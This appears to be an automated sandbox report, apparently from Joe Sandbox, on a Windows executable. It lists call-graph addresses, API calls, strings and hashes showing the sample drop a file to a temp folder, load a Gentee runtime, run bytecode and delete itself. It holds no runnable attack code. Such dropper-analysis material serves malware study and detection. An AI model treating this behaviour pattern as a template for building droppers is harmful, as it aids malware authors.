4309->4310 4310->4298 4310->4299 4311 10001180 4312 100011a7 4311->4312 4313 100011ae 4311->4313 4312->4313 4314 10001398 _ftol 4312->4314 4315 10001361 _ftol 4312->4315 4316 100013ab _ftol 4312->4316 4317 10001374 _ftol 4312->4317 4428 100010cb 4430 100010e7 4428->4430 4432 100010de 4428->4432 4430->4432 4435 1000110f 4430->4435 4436 10001020 4430->4436 4431 1000112f 4434 10001020 3 API calls 4431->4434 4431->4435 4432->4431 4433 10001020 3 API calls 4432->4433 4432->4435 4433->4431 4434->4435 4437 10001028 4436->4437 4438 1000105e 4437->4438 4439 10001088 4437->4439 4440 10001049 malloc 4437->4440 4438->4432 4439->4438 4442 100010b5 free 4439->4442 4440->4438 4441 10001062 _initterm 4440->4441 4441->4438 4442->4438 4443 100022cd 4445 10002278 4443->4445 4444 100040a0 2 API calls 4446 10002b51 4444->4446 4445->4444 4447 100022fa 4445->4447 3753 10002fd0 3754 10002fe6 3753->3754 3755 1000301d 3754->3755 3758 10003980 5 API calls 3754->3758 3756 10003087 3755->3756 3757 100030bd 3755->3757 3761 10004bf0 9 API calls 3756->3761 3840 100033b0 3757->3840 3759 1000300a GetCommandLineA 3758->3759 3759->3755 3762 10003091 3761->3762 3806 10004aa0 3762->3806 3769 100030fd 3773 10003430 4 API calls 3769->3773 3771 100030e6 3771->3769 3772 10003b40 4 API calls 3771->3772 3772->3769 3776 10003111 3773->3776 3775 100030bb 3777 10006200 3775->3777 3778 1000620e 3777->3778 3779 100040a0 2 API calls 3778->3779 3781 10006222 3778->3781 3779->3781 3780 10006246 3783 100040a0 2 API calls 3780->3783 3784 10006261 3780->3784 3781->3780 3782 100040a0 2 API calls 3781->3782 3782->3780 3783->3784 3785 100040a0 2 API calls 3784->3785 3792 10007be0 11 API calls 3784->3792 3794 100074f0 11 API calls 3784->3794 3795 100030da 3784->3795 3843 10006180 3784->3843 3848 10007770 3784->3848 3853 10007e00 3784->3853 3860 10007ce0 3784->3860 3865 10007d60 3784->3865 3870 100061a0 3784->3870 3874 10007ec0 3784->3874 3785->3784 3792->3784 3794->3784 3795->3771 3796 100057a0 3795->3796 3800 1000582c 3796->3800 3801 100057bb 3796->3801 3797 100021e0 7 API calls 3802 10005855 3797->3802 3798 100057e8 3798->3801 3948 10005710 3798->3948 3800->3797 3800->3802 3801->3798 3801->3800 3805 100021e0 7 API calls 3801->3805 3909 10005600 3801->3909 3945 10005770 3801->3945 3802->3771 3805->3801 4117 10003410 3806->4117 3809 100063b0 3810 10004bf0 9 API calls 3809->3810 3811 100063c3 3810->3811 4121 10005aa0 3811->4121 3813 100063d2 3815 100063e3 3813->3815 4125 10004ce0 3813->4125 3816 10005af0 CreateFileA 3815->3816 3828 10006412 3816->3828 3817 1000644f 4128 10005b80 GetFileSize 3817->4128 3819 10006451 3821 100040a0 2 API calls 3819->3821 3821->3817 3822 100035b0 9 API calls 3824 1000647b 3822->3824 3823 100064a5 4133 10005a90 CloseHandle 3823->4133 3824->3823 4131 10005b50 ReadFile 3824->4131 3825 10004af0 10 API calls 3825->3828 3828->3817 3828->3819 3828->3825 3831 10005af0 CreateFileA 3828->3831 3829 100064b5 3832 100033f0 9 API calls 3829->3832 3831->3828 3833 100064c0 3832->3833 3835 10003430 4 API calls 3833->3835 3834 100040a0 2 API calls 3834->3823 3836 100030b1 3835->3836 3837 10003430 3836->3837 3838 10003b40 4 API calls 3837->3838 3839 1000343d 3838->3839 3839->3775 3841 100035b0 9 API calls 3840->3841 3842 100033cb 3841->3842 3842->3775 3844 10006860 9 API calls 3843->3844 3845 10006188 3844->3845 3846 10006f50 11 API calls 3845->3846 3847 10006191 3846->3847 3847->3784 3849 10007680 9 API calls 3848->3849 3850 100077ac 3849->3850 3851 10006f50 11 API calls 3850->3851 3852 10007b1c 3851->3852 3852->3784 3854 10007220 9 API calls 3853->3854 3855 10007e1c 3854->3855 3856 10006f50 11 API calls 3855->3856 3857 10007e4b 3856->3857 3858 10006860 9 API calls 3857->3858 3859 10007e8f 3858->3859 3859->3784 3861 10007220 9 API calls 3860->3861 3862 10007cfc 3861->3862 3863 10006f50 11 API calls 3862->3863 3864 10007d3b 3863->3864 3864->3784 3866 10007220 9 API calls 3865->3866 3867 10007d76 3866->3867 3868 10006f50 11 API calls 3867->3868 3869 10007dd6 3868->3869 3869->3784 3873 100061af 3870->3873 3871 100061ef 3871->3784 3873->3871 3879 10007f30 3873->3879 3875 10007220 9 API calls 3874->3875 3876 10007eda 3875->3876 3877 10006f50 11 API calls 3876->3877 3878 10007efb 3877->3878 3878->3784 3882 10003730 3879->3882 3881 10007f3f 3881->3873 3887 10004f10 3882->3887 3886 10003750 3886->3881 3888 10003980 5 API calls 3887->3888 3889 10004f18 3888->3889 3890 10004bf0 9 API calls 3889->3890 3891 10004f20 3890->3891 3892 1000373b 3891->3892 3893 10004aa0 9 API calls 3891->3893 3894 100036d0 3892->3894 3893->3892 3903 10003320 3894->3903 3897 10003714 3900 10003320 9 API calls 3897->3900 3898 100036f6 3906 10003290 3898->3906 3902 10003721 3900->3902 3901 1000370c 3901->3886 3902->3886 3904 100034f0 9 API calls 3903->3904 3905 1000332d 3904->3905 3905->3897 3905->3898 3907 100034f0 9 API calls 3906->3907 3908 100032a4 3907->3908 3908->3901 3910 10004bf0 9 API calls 3909->3910 3911 1000560e 3910->3911 3912 10004bf0 9 API calls 3911->3912 3913 10005618 3912->3913 3914 10004aa0 9 API calls 3913->3914 3915 1000562a 3914->3915 3916 10005632 3915->3916 3917 1000569a 3915->3917 3952 10006500 3916->3952 3918 100056b0 3917->3918 3919 1000569f 3917->3919 3978 100033f0 3918->3978 3967 10006570 3919->3967 3924 100056ae 3929 100056da 3924->3929 3930 100056cd LoadLibraryA 3924->3930 3926 10005655 3927 1000565b 3926->3927 3928 1000566d 3926->3928 3931 100040a0 2 API calls 3927->3931 3964 10005bc0 WriteFile 3928->3964 3933 100056e3 3929->3933 3934 100056e8 GetModuleHandleA 3929->3934 3930->3933 3935 1000566a 3931->3935 3937 10003430 4 API calls 3933->3937 3934->3933 3935->3928 3939 100056fd 3937->3939 3938 1000568e 3966 10005a90 CloseHandle 3938->3966 3942 10003430 4 API calls 3939->3942 3940 100040a0 2 API calls 3940->3938 3943 10005707 3942->3943 3943->3801 3944 10005697 3944->3924 4078 10004470 3945->4078 3949 1000571c 3948->3949 3951 10005740 3948->3951 3950 10005751 GetProcAddress 3949->3950 3949->3951 3950->3951 3951->3798 3953 10004bf0 9 API calls 3952->3953 3954 1000650e 3953->3954 3981 100064e0 3954->3981 3959 10003430 4 API calls 3960 10005641 3959->3960 3960->3924 3961 10005af0 3960->3961 3962 10005af8 CreateFileA 3961->3962 3962->3926 3965 1000567b 3964->3965 3965->3938 3965->3940 3966->3944 3968 10004bf0 9 API calls 3967->3968 3969 1000657e 3968->3969 4050 10006540 3969->4050 3971 10006588 4054 10004b80 3971->4054 3974 10004af0 10 API calls 3975 100065a5 3974->3975 3976 10003430 4 API calls 3975->3976 3977 100065af 3976->3977 3977->3924 3979 100033b0 9 API calls 3978->3979 3980 10003405 3979->3980 3980->3924 3991 10005c40 3981->3991 3983 100064e5 3984 100033f0 9 API calls 3983->3984 3985 100064f0 3984->3985 3986 10004af0 3985->3986 3987 100033f0 9 API calls 3986->3987 3988 10004b00 3987->3988 3989 10004d10 10 API calls 3988->3989 3990 10004b1e 3989->3990 3990->3959 3992 10005c4d 3991->3992 3993 10005d68 3992->3993 3994 10004bf0 9 API calls 3992->3994 3993->3983 3995 10005c62 3994->3995 4014 10005c00 3995->4014 3997 10005c68 3998 10005c71 GetTickCount 3997->3998 4001 10005c83 3997->4001 3998->4001 4000 10005af0 CreateFileA 4000->4001 4001->4000 4003 10005d2d 4001->4003 4008 10005cd1 4001->4008 4018 10004d10 4001->4018 4022 100059a0 4003->4022 4004 10004aa0 9 API calls 4004->4008 4005 100040a0 2 API calls 4005->4008 4008->4001 4008->4004 4008->4005 4042 10005bf0 GetFileAttributesA 4008->4042 4043 10005960 CreateDirectoryA 4008->4043 4011 10005d54 4012 10003430 4 API calls 4011->4012 4013 10005d5e 4012->4013 4013->3983 4044 100035b0 4014->4044 4017 10005c25 4017->3997 4019 100034f0 9 API calls 4018->4019 4020 10004d25 vsprintf 4019->4020 4021 10004d45 4020->4021 4021->4001 4023 10004bf0 9 API calls 4022->4023 4024 100059b2 4023->4024 4025 100035b0 9 API calls 4024->4025 4026 100059c1 4025->4026 4027 10004d10 10 API calls 4026->4027 4028 100059dc FindFirstFileA 4027->4028 4029 10005a70 4028->4029 4033 100059f6 4028->4033 4030 10003430 4 API calls 4029->4030 4031 10005a7a 4030->4031 4048 10005980 RemoveDirectoryA 4031->4048 4032 10005a5c FindNextFileA 4032->4033 4036 10005a68 FindClose 4032->4036 4033->4032 4040 10005a10 4033->4040 4035 10005a80 4041 10005960 CreateDirectoryA 4035->4041 4036->4029 4037 10004d10 10 API calls 4037->4040 4038 100059a0 12 API calls 4038->4040 4040->4032 4040->4037 4040->4038 4049 10005ae0 DeleteFileA 4040->4049 4041->4011 4042->4008 4043->4008 4045 100035c7 GetTempPathA 4044->4045 4046 100035bd 4044->4046 4045->4017 4047 100034f0 9 API calls 4046->4047 4047->4045 4048->4035 4049->4032 4051 100035b0 9 API calls 4050->4051 4052 10006550 GetModuleFileNameA 4051->4052 4053 10006567 4052->4053 4053->3971 4061 10004c20 4054->4061 4056 10004b93 4058 10004aa0 9 API calls 4056->4058 4059 10004bb9 4056->4059 4057 10004bd7 4057->3974 4058->4059 4059->4057 4065 10004b30 4059->4065 4062 10004c3a 4061->4062 4063 10004c51 IsDBCSLeadByte 4062->4063 4064 10004c76 4062->4064 4063->4062 4064->4056 4067 10004b3b 4065->4067 4066 10004b69 4066->4057 4067->4066 4070 10004ac0 4067->4070 4071 100033b0 9 API calls 4070->4071 4072 10004adc 4071->4072 4075 100032f0 4072->4075 4076 100034f0 9 API calls 4075->4076 4077 100032fd 4076->4077 4077->4057 4079 100045e4 4078->4079 4082 10004482 4078->4082 4079->3801 4080 10004470 11 API calls 4080->4082 4082->4079 4082->4080 4083 100021e0 7 API calls 4082->4083 4084 100033b0 9 API calls 4082->4084 4085 10004aa0 9 API calls 4082->4085 4088 10002cf0 7 API calls 4082->4088 4090 10002cd0 4082->4090 4093 10004920 4082->4093 4099 10004990 4082->4099 4105 100037f0 4082->4105 4083->4082 4084->4082 4085->4082 4088->4082 4091 100021e0 7 API calls 4090->4091 4092 10002ce9 4091->4092 4092->4082 4094 10004939 4093->4094 4095 10003a80 5 API calls 4094->4095 4096 10004947 4095->4096 4097 10004470 11 API calls 4096->4097 4098 10004982 4097->4098 4098->4082 4100 100049a0 4099->4100 4112 100043f0 4100->4112 4103 10003b40 4 API calls 4104 100049c3 4103->4104 4104->4082 4106 1000388e 4105->4106 4111 10003805 4105->4111 4106->4082 4107 10004920 11 API calls 4107->4111 4108 10003885 4108->4082 4109 100036d0 9 API calls 4109->4111 4110 100037f0 11 API calls 4110->4111 4111->4107 4111->4108 4111->4109 4111->4110 4113 10004468 4112->4113 4114 100043fb 4112->4114 4113->4103 4114->4113 4115 10002cd0 7 API calls 4114->4115 4116 100043f0 7 API calls 4114->4116 4115->4114 4116->4114 4118 1000341b 4117->4118 4119 100033b0 9 API calls 4118->4119 4120 100030a0 4119->4120 4120->3809 4122 100035b0 9 API calls 4121->4122 4123 10005ab0 GetFullPathNameA 4122->4123 4124 10005ad1 4123->4124 4124->3813 4126 10004c20 IsDBCSLeadByte 4125->4126 4127 10004cf3 4126->4127 4127->3815 4129 10005b9c GetLastError 4128->4129 4130 10005ba6 4128->4130 4129->4130 4130->3822 4132 10005b71 4131->4132 4132->3823 4132->3834 4133->3829 3745 10008190 3748 10006070 3745->3748 3751 10005f90 CompareStringA 3748->3751 3752 10005fb2 3751->3752 4464 10008bd0 4465 10008be4 4464->4465 4468 10008540 4465->4468 4472 1000855b 4468->4472 4469 100068f0 9 API calls 4469->4472 4471 10008bb5 4472->4469 4472->4471 4473 10006970 9 API calls 4472->4473 4474 100067a0 4472->4474 4473->4472 4475 100065e0 9 API calls 4474->4475 4476 100067b1 4475->4476 4476->4472 4134 10002cd0 4135 100021e0 7 API calls 4134->4135 4136 10002ce9 4135->4136 4201 10004d50 4202 100034f0 9 API calls 4201->4202 4205 10004d74 4202->4205 4203 10004df3 vsprintf 4204 10004e18 4203->4204 4205->4203 4448 100020d0 4449 1000210c 4448->4449 4450 100035b0 9 API calls 4449->4450 4451 10002112 4450->4451 4453 10002170 4451->4453 4454 10003320 9 API calls 4451->4454 4452 100021b2 4455 10003430 4 API calls 4452->4455 4453->4452 4456 100036d0 9 API calls 4453->4456 4454->4451 4457 100021bc 4455->4457 4456->4453 4458 401890 lstrcmpA 4459 4018b2 lstrcmpA 4458->4459 4460 4018a8 4458->4460 4461 10006dd0 4462 10006d20 11 API calls 4461->4462 4463 10006df3 4462->4463 4321 10002995 4322 100029a1 4321->4322 4325 100029af 4321->4325 4323 100040a0 2 API calls 4322->4323 4323->4325 4324 10003980 5 API calls 4326 100029fe 4324->4326 4325->4324 4325->4326 4327 100040a0 2 API calls 4326->4327 4330 10002278 4326->4330 4327->4330 4328 100040a0 2 API calls 4329 10002b51 4328->4329 4330->4328 4331 100022fa 4330->4331 3636 401d20 __set_app_type __p__fmode __p__commode 3637 401d8f 3636->3637 3638 401da3 3637->3638 3639 401d97 __setusermatherr 3637->3639 3648 401e8a _controlfp 3638->3648 3639->3638 3641 401da8 _initterm __getmainargs _initterm 3642 401dfc GetStartupInfoA 3641->3642 3644 401e30 GetModuleHandleA 3642->3644 3649 4018d0 GetModuleFileNameA 3644->3649 3648->3641 3650 4018fd wsprintfA CreateMutexA GetLastError 3649->3650 3651 40193e 3649->3651 3650->3651 3652 401929 lstrcpyA 3650->3652 3653 401993 GetModuleHandleA 3651->3653 3654 401947 CreateFileA GetFileSize 3651->3654 3656 401aca lstrcpyA lstrcatA MessageBoxA ExitProcess 3652->3656 3655 4019b5 3653->3655 3657 401977 lstrcpyA 3654->3657 3658 40198c CloseHandle 3654->3658 3672 401c20 VirtualAlloc 3655->3672 3657->3656 3658->3653 3660 4019c2 3673 4016a0 3660->3673 3662 4019d8 3662->3656 3663 4019e0 LoadLibraryA 3662->3663 3664 401a10 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3663->3664 3665 4019f4 wsprintfA 3663->3665 3666 401a6f 3664->3666 3665->3656 3667 401a84 lstrcpyA 3666->3667 3668 401a96 3666->3668 3667->3656 3691 401c40 VirtualFree 3668->3691 3670 401aa5 FreeLibrary FreeLibrary DeleteFileA ExitProcess 3672->3660 3674 4016b6 3673->3674 3677 401767 3673->3677 3676 4016c2 GetTempPathA lstrlenA 3674->3676 3675 40180f 3675->3662 3678 4016e2 lstrlenA 3676->3678 3679 4016ea wsprintfA GetFileAttributesA 3676->3679 3677->3675 3681 4012b0 3 API calls 3677->3681 3678->3679 3679->3677 3680 40170a CreateFileA 3679->3680 3682 4017b1 3680->3682 3683 40172b 3680->3683 3684 4017a2 3681->3684 3692 4012b0 3682->3692 3686 401733 lstrcpyA CreateDirectoryA wsprintfA GetFileAttributesA 3683->3686 3687 4017f7 lstrcpyA 3683->3687 3684->3662 3686->3677 3686->3680 3687->3662 3689 4017e1 3689->3687 3690 4017eb CloseHandle 3689->3690 3690->3677 3691->3670 3693 4012d5 3692->3693 3701 4014c0 3693->3701 3695 401497 3712 401530 3695->3712 3700 401333 3700->3695 3723 401050 3700->3723 3731 401670 3700->3731 3734 401cb0 3701->3734 3703 4014e0 3704 401cb0 VirtualAlloc 3703->3704 3705 4014ed 3704->3705 3706 401cb0 VirtualAlloc 3705->3706 3707 4014fc 3706->3707 3737 401c20 VirtualAlloc 3707->3737 3709 401516 3738 401c20 VirtualAlloc 3709->3738 3711 401523 3711->3700 3740 401c40 VirtualFree 3712->3740 3714 40153e 3741 401c40 VirtualFree 3714->3741 3716 401547 3742 401c40 VirtualFree 3716->3742 3718 401550 3743 401c40 VirtualFree 3718->3743 3720 401559 3744 401c40 VirtualFree 3720->3744 3722 4014ae WriteFile 3722->3687 3722->3689 3724 401073 3723->3724 3725 4014c0 VirtualAlloc 3724->3725 3728 401098 3724->3728 3726 4010ce 3725->3726 3727 401050 2 API calls 3726->3727 3730 4010ee 3727->3730 3728->3700 3729 401530 VirtualFree 3729->3728 3730->3729 3732 401697 3731->3732 3733 401678 gentee_call 3731->3733 3732->3700 3733->3732 3739 401c20 VirtualAlloc 3734->3739 3736 401cbb 3736->3703 3737->3709 3738->3711 3739->3736 3740->3714 3741->3716 3742->3718 3743->3720 3744->3722 4149 10005020 4150 10004c20 IsDBCSLeadByte 4149->4150 4151 1000504c 4150->4151 4152 10004c20 IsDBCSLeadByte 4151->4152 4153 1000505a 4152->4153 4158 10004f80 4153->4158 4156 10004f80 4 API calls 4157 100050be 4156->4157 4162 10004f99 4158->4162 4159 10004fa4 CharLowerA CharLowerA 4159->4162 4160 10004ffa 4160->4156 4160->4157 4161 10004fc3 CharLowerA CharLowerA 4161->4162 4162->4159 4162->4160 4162->4161 4163 10003220 4164 100031f0 9 API calls 4163->4164 4165 10003231 4164->4165 4166 10008120 4169 10002cf0 4166->4169 4170 100021e0 7 API calls 4169->4170 4171 10002d1c 4170->4171 4172 10003120 4173 1000313f 4172->4173 4176 10003164 4172->4176 4178 10006720 4173->4178 4181 10005470 4176->4181 4177 10003151 4179 100065e0 9 API calls 4178->4179 4180 10006731 4179->4180 4180->4177 4182 10006720 9 API calls 4181->4182 4183 10005494 4182->4183 4183->4177 4209 10004a60 4210 10004d10 10 API calls 4209->4210 4211 10004a74 4210->4211 4332 10002ea0 4333 10002eae 4332->4333 4334 10002eb5 4332->4334 4333->4334 4335 10004aa0 9 API calls 4333->4335 4336 10002ee4 4335->4336 4337 10006da0 4340 10006d20 4337->4340 4339 10006dbb 4341 10006d2c 4340->4341 4342 10006d50 4341->4342 4343 10006d34 4341->4343 4346 10006d5d 4342->4346 4348 10006c60 4342->4348 4344 10006b60 7 API calls 4343->4344 4347 10006d3e 4344->4347 4346->4339 4347->4339 4349 10006c70 4348->4349 4352 10006c80 4349->4352 4351 10006c77 4351->4346 4353 10006c88 4352->4353 4354 10006c8f 4352->4354 4353->4351 4359 10003470 4354->4359 4356 10006cc3 4358 10006cf8 4356->4358 4363 10004840 4356->4363 4358->4351 4360 10003482 4359->4360 4361 100034f0 9 API calls 4360->4361 4362 1000348f 4361->4362 4362->4356 4364 10004875 4363->4364 4365 1000485a 4363->4365 4366 10004470 11 API calls 4364->4366 4365->4356 4366->4365 4485 10005de5 4486 10005df0 4485->4486 4487 10005e0b 4485->4487 4488 10003980 5 API calls 4486->4488 4490 10005e33 4487->4490 4491 10005e1c WriteFile 4487->4491 4489 10005df9 CharToOemA 4488->4489 4489->4487 4493 10005e43 WriteConsoleA 4490->4493 4494 10005d80 4 API calls 4490->4494 4492 10005e59 4491->4492 4495 10005e68 4492->4495 4496 10003b40 4 API calls 4492->4496 4493->4492 4494->4493 4496->4495 4497 100028e6 4498 10002b5f 4497->4498 4499 100028ef 4497->4499 4500 10003b40 4 API calls 4498->4500 4502 1000293c 4499->4502 4504 10002920 4499->4504 4506 100045f0 4499->4506 4501 10002b86 4500->4501 4504->4502 4505 10003b40 4 API calls 4504->4505 4505->4502 4507 10004612 4506->4507 4508 1000463c 4506->4508 4509 100043f0 7 API calls 4507->4509 4508->4499 4509->4508 4367 100022ae 4368 100022fa 4367->4368 4369 10002278 4367->4369 4369->4367 4369->4368 4370 100040a0 2 API calls 4369->4370 4371 10002b51 4370->4371 3473 10002d30 3474 10002d96 3473->3474 3475 10002d55 3473->3475 3477 100021e0 3475->3477 3484 10003980 EnterCriticalSection 3477->3484 3479 10002b46 3490 100040a0 3479->3490 3482 100021f2 3482->3479 3483 100022fa 3482->3483 3483->3474 3485 1000399b malloc LeaveCriticalSection 3484->3485 3488 100039c6 3484->3488 3485->3482 3487 10003a27 3489 10003a63 LeaveCriticalSection 3487->3489 3488->3487 3488->3489 3496 100038c0 malloc 3488->3496 3489->3482 3495 100040b2 3490->3495 3491 10002b51 3491->3474 3492 1000422a ExitThread 3494 1000421c 3494->3491 3494->3492 3495->3491 3495->3492 3498 10005990 SetCurrentDirectoryA 3495->3498 3497 100038f3 3496->3497 3497->3488 3498->3494 4212 10006d70 4215 10006c20 4212->4215 4220 10006c00 4215->4220 4221 10006c0b 4220->4221 4227 10006b60 4221->4227 4223 10006c14 4224 10003260 4223->4224 4225 10003b40 4 API calls 4224->4225 4226 1000326d 4225->4226 4228 10006b6d 4227->4228 4229 10006b7d 4228->4229 4231 100048b0 4228->4231 4229->4223 4232 100048f2 4231->4232 4233 100048c9 4231->4233 4232->4228 4234 100043f0 7 API calls 4233->4234 4234->4232 4235 10008170 4238 10006050 4235->4238 4241 10005f50 CompareStringA 4238->4241 4242 10005f72 4241->4242 4372 10002db0 4393 10005100 4372->4393 4375 10002e1c 4376 10003430 4 API calls 4375->4376 4378 10002e26 4376->4378 4377 10004bf0 9 API calls 4379 10002dcb 4377->4379 4408 10003af0 4378->4408 4381 100035b0 9 API calls 4379->4381 4383 10002dda 4381->4383 4382 10002e2b 4384 100059a0 15 API calls 4383->4384 4385 10002de4 4384->4385 4406 10005a90 CloseHandle 4385->4406 4387 10002df0 4388 10004d10 10 API calls 4387->4388 4389 10002e05 4388->4389 4407 10005ae0 DeleteFileA 4389->4407 4391 10002e12 4392 10003430 4 API calls 4391->4392 4392->4375 4395 1000510b 4393->4395 4394 1000515f 4396 100069c0 4 API calls 4394->4396 4395->4394 4399 100043f0 7 API calls 4395->4399 4400 10005153 FreeLibrary 4395->4400 4397 1000516b 4396->4397 4398 100065c0 4 API calls 4397->4398 4401 10005175 4398->4401 4399->4395 4400->4395 4402 10003430 4 API calls 4401->4402 4403 10005189 4402->4403 4413 10006820 4403->4413 4406->4387 4407->4391 4409 10003b40 4 API calls 4408->4409 4410 10003afc 4409->4410 4412 10003b0d free free DeleteCriticalSection 4410->4412 4417 10003920 4410->4417 4412->4382 4414 10002db8 4413->4414 4415 1000682d 4413->4415 4414->4375 4414->4377 4415->4414 4416 10003b40 EnterCriticalSection free LeaveCriticalSection LeaveCriticalSection 4415->4416 4416->4415 4418 10003941 4417->4418 4419 10003938 free 4417->4419 4418->4410 4419->4418 4420 100081b0 4423 10006090 4420->4423 4426 10005fd0 CompareStringW 4423->4426 4427 10005ff2 4426->4427 4510 100084f0 4511 10008503 4510->4511 4512 10004aa0 9 API calls 4511->4512 4513 10008522 4511->4513 4512->4513 4514 10008bf0 4515 10008bf9 4514->4515 4517 10008c03 4514->4517 4516 10003980 5 API calls 4515->4516 4516->4517 4518 10006930 9 API calls 4517->4518 4519 10008c48 4518->4519 4520 10006740 9 API calls 4519->4520 4521 10008c5a 4520->4521 4522 10008c78 4521->4522 4524 10008cd0 4521->4524 4525 10008cea 4524->4525 4526 100035b0 9 API calls 4525->4526 4531 10008cf6 4526->4531 4527 10008fb6 4527->4522 4528 10008f5d 4528->4527 4532 100067c0 4528->4532 4529 10003320 9 API calls 4529->4531 4531->4528 4531->4529 4531->4531 4533 100065e0 9 API calls 4532->4533 4534 100067d1 4533->4534 4534->4528 4187 401e72 _exit 4137 10002a73 4138 10002a7d 4137->4138 4139 10002a8f 4137->4139 4140 100040a0 2 API calls 4138->4140 4142 10002adc CreateThread 4139->4142 4143 10002aba 4139->4143 4141 10002a8c 4140->4141 4141->4139 4142->4143 4188 10002736 4189 10002741 4188->4189 4191 10002751 4188->4191 4189->4191 4192 10004a40 4189->4192 4195 100032d0 4192->4195 4196 10003290 9 API calls 4195->4196 4197 100032e5 4196->4197 4197->4191 4535 100026fe 4538 10004650 4535->4538 4539 100045f0 7 API calls 4538->4539 4540 10004663 4539->4540 4541 10004470 11 API calls 4540->4541 4542 1000270b 4541->4542

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10004D10: vsprintf.MSVCRT ref: 10004D34
                                            • FindFirstFileA.KERNELBASE(0000005C,?,00000200,00000000), ref: 100059E9
                                            • FindNextFileA.KERNEL32(00000000,?,?), ref: 10005A62
                                            • FindClose.KERNEL32(00000000), ref: 10005A69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2112023724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2112007918.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112040580.000000001000A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112054924.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2112068924.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextvsprintf
                                            • String ID: %s%c%s$%s%c*.*$.
                                            • API String ID: 3329218086-3888266457
                                            • Opcode ID: fe9b148c403627668117ac8923b46573ac1af3a29b8214059a60aa9b7f080896
                                            • Instruction ID: 1065b162a1b9fca1b1ad62252492fc21ac605415f60a94d0c9e05d291c74bad9
                                            • Opcode Fuzzy Hash: fe9b148c403627668117ac8923b46573ac1af3a29b8214059a60aa9b7f080896
                                            • Instruction Fuzzy Hash: FE21C479104744AAF210DB60CC85EAF77ACDF862D1F408A1DF5914309AE736E5498B67

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200,?,?,00000000), ref: 004018E8
                                            • wsprintfA.USER32 ref: 00401908
                                            • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 00401916
                                            • GetLastError.KERNEL32 ref: 0040191C
                                            • lstrcpyA.KERNEL32(?,The application has already run.), ref: 00401933
                                            • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000), ref: 0040195E
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401969
                                            • lstrcpyA.KERNEL32(?,The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses.,?,?,00000000), ref: 00401981
                                            • CloseHandle.KERNELBASE(00000000,?,?,00000000), ref: 0040198D
                                            • GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 00401995
                                            • LoadLibraryA.KERNELBASE(?,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004019E8
                                            • wsprintfA.USER32 ref: 00401A06
                                            • lstrcpyA.KERNEL32(?,ERROR: ,?,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401ADF
                                            • lstrcatA.KERNEL32(00000000,?,?,00000000), ref: 00401AE6
                                            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 00401AFD
                                            • ExitProcess.KERNEL32 ref: 00401B05
                                            Strings
                                            • gentee_set, xrefs: 00401A35
                                            • gentee_init, xrefs: 00401A17
                                            • The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses., xrefs: 0040197B
                                            • Cannot load %s., xrefs: 00401A00
                                            • The application has already run., xrefs: 0040192D
                                            • ERROR: , xrefs: 00401AD9
                                            • The executable file does not have a bytecode!, xrefs: 00401A88
                                            • gentee_deinit, xrefs: 00401A1F
                                            • gentee_call, xrefs: 00401A41
                                            • gentee_load, xrefs: 00401A29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2109673953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2109662170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109685375.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109696404.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2109707809.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_BWuMwnE7tw.jbxd
                                            Similarity
                                            • API ID: Filelstrcpy$CreateHandleModulewsprintf$CloseErrorExitLastLibraryLoadMessageMutexNameProcessSizelstrcat
                                            • String ID: Cannot load %s.$ERROR: $The application has already run.$The executable file does not have a bytecode!$The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses.$gentee_call$gentee_deinit$gentee_init$gentee_load$gentee_set
                                            • API String ID: 2761331275-813548115
                                            • Opcode ID: 75c1140eaf22f4bbb1cb2a1445d8aadd826d4f0cede038027645ba1c2c6d0f94
                                            • Instruction ID: 9a6b1dca81c645f7f4531fc4d6c81cc0b764753a35578a77395dc2e12349a1f0
                                            • Opcode Fuzzy Hash: 75c1140eaf22f4bbb1cb2a1445d8aadd826d4f0cede038027645ba1c2c6d0f94
                                            • Instruction Fuzzy Hash: 6C517371245305ABD320AF60DE4DFAB3BACAB84701F10493AF705B61E0D7B89505CBA9

                                            Control-flow Graph

                                            APIs
                                            • GetTempPathA.KERNEL32(00000200,?,?,00000028,75A78400,00000000,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400), ref: 004016CC
                                            • lstrlenA.KERNEL32(?,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016D9
                                            • lstrlenA.KERNEL32(?,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016E3
                                            • wsprintfA.USER32 ref: 004016F5
